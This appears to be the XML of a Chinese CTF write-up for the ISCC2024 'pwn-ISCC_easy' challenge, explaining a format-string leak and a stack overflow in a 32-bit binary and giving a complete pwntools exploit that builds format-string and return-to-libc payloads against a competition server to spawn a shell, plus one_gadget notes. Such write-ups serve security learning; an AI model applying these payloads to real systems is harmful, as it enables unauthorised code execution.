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26390" w14:textId="608BA2E4" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ISCC2024 WriteUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC96CDB" w14:textId="18D102EC" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AkyOI 李承达 </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E002E7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>3433778745@qq.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="778FFCC7" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="23327266" w14:textId="1B332360" w:rsidR="00287AEB" w:rsidRDefault="00644402" w:rsidP="00287AEB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00287AEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wn-ISCC_easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A860E" w14:textId="7A9BE26E" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E16864" w14:textId="1F4AAB66" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32位的题目，上来一个格式字符串漏洞，直接泄露地址并且修改x为5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F4ECF" w14:textId="45AF6C33" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r w:rsidRPr="00287AEB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D6CBD2" wp14:editId="4C563BB0">
            <wp:extent cx="3219899" cy="1314633"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172772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1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E8D" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="1846BB6F" w14:textId="562019C3" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后welcome函数里面有栈溢出，直接栈溢出运行system(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)就行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB1F1C" w14:textId="421FCB3D" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r w:rsidRPr="00287AEB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C4CBC2" wp14:editId="10C9C133">
            <wp:extent cx="3781953" cy="1790950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="128979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B168" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRPr="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2D5278" w14:textId="0A0E1530" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FCA262" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE7DAA" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>from pwn import*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57CA75" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>from Crypto.Util.number import long_to_bytes,bytes_to_long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FED355" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="02FE1BC8" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>context.log_level='debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C6819" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>context(arch='i386',os='linux')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B279DF" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>context.terminal=['tmux','splitw','-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA5B58" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="788F180E" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>pwn = './easy'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249AD02B" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>p=remote('182.92.237.102',10013)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230B77E" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#p=process(['./ld-2.31.so', pwn], env={"LD_PRELOAD":'./libc-2.31.so'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC4D9F" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># p=process('./easy')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A6F01" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># gdb.attach(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C15395" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#elf=ELF(pwn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB039EB" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#libc=ELF('./libc.so.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AACE75" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="78BF090F" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>x_a=0x804C030</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CB8B3F" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>off=4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A9C109" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>pl=b'%5c%9$n%15$p%12$paaa'+p32(x_a)+b'/bin/sh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F453F" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>pay=b'aaaa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F04699" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>p.sendline(pl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D124B6" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>pl=b'a'*0x94+p32(0xc890b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A3EBF" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>p.recvuntil(b'0x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5FD0D" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>libc=int(p.recv(8),16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289C97E" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>base=libc-(0xf20ceed5-0xf20b4000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B03C495" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>p.recvuntil(b'0x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9971DA" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>stk=int(p.recv(8),16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB19D5A" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>buf=stk-(0xffc685b0-0xffc68588)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE4169" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>pl=b'a'*0x94+p32(base+0x41360)+p32(0x08049399)+p32(buf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50506E" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>p.sendline(pl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A6C65" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D2FC4" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="776E3A35" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="5ABBF272" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># 0xc890b execve("/bin/sh", [ebp-0x2c], esi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7750EE88" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBBF8E" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#   address ebp-0x20 is writable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67509701" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#   ebx is the GOT address of libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BDFB46" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#   [[ebp-0x2c]] == NULL || [ebp-0x2c] == NULL || [ebp-0x2c] is a valid argv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D7436" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#   [esi] == NULL || esi == NULL || esi is a valid envp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244015E8" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="49953A66" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># 0x1421b3 execl("/bin/sh", eax)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEE4214" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69F01A" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#   ebp is the GOT address of libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2CF296" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#   eax == NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79630F7F" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="68568561" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># 0x1421b4 execl("/bin/sh", [esp])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47B905" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t># constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91EC68" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:t>#   ebp is the GOT address of libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58616FBE" w14:textId="5527015C" w:rsidR="00287AEB" w:rsidRPr="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>#   [esp] == NULL</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00287AEB" w:rsidRPr="00287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A"/>
    <w:rsid w:val="00287AEB"/>
    <w:rsid w:val="00644402"/>
    <w:rsid w:val="006C1BAA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083F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{15083A54-CA50-436C-99CC-B2343993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7A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7AE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7AE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87A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34337787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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-09T12:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-09T12:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>